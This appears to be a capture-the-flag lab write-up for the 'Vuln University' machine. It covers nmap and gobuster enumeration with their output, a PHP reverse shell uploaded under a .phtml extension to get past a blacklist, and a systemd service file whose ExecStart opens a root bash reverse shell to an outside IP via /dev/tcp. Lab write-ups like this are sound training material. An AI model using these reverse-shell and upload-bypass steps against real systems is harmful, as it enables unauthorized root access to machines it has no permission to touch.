Scanning (IP : 10.10.46.215)
Copy > nmap -sC -sV 10.10.46.215 > nmap.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 05:42 EDT
Nmap scan report for 10.10.187.173
Host is up (0.19s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Copy > gobuster dir -u http://10.10.46.215 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.54.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/14 05:45:27 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 322] [--> http://10.10.187.173:3333/images/]
/css (Status: 301) [Size: 319] [--> http://10.10.187.173:3333/css/]
/js (Status: 301) [Size: 318] [--> http://10.10.187.173:3333/js/]
/fonts (Status: 301) [Size: 321] [--> http://10.10.187.173:3333/fonts/]
/internal (Status: 301) [Size: 324] [--> http://10.10.187.173:3333/internal/]
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/09/14 05:53:07 Finished
===============================================================
> gobuster dir -u http://10.10.46.215/internal/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt > gobuster.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.54.136
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/09/14 05:53:39 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 332] [--> http://10.10.187.173:3333/internal/uploads/]
/css (Status: 301) [Size: 328] [--> http://10.10.187.173:3333/internal/css/]
[!] Keyboard interrupt detected, terminating.
===============================================================
2021/09/14 05:54:16 Finished
=============================================================== Upload Malacious PHP FIile
Some Php extensions are blacklisted but .phtml extension works here. Php-reverse shell can be found /usr/share/webshells/php/php-reverse-shell.php in Kali Linux. Change IP to your IP and open a netcat listner on port 1234. nc -lnvp 1234 . Now, You get the reverse shell and can get user.txt.
Privileges escalations (root.txt)
Copy [Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.17.21.93/9999 0>&1'
[Install]
WantedBy=multi-user.target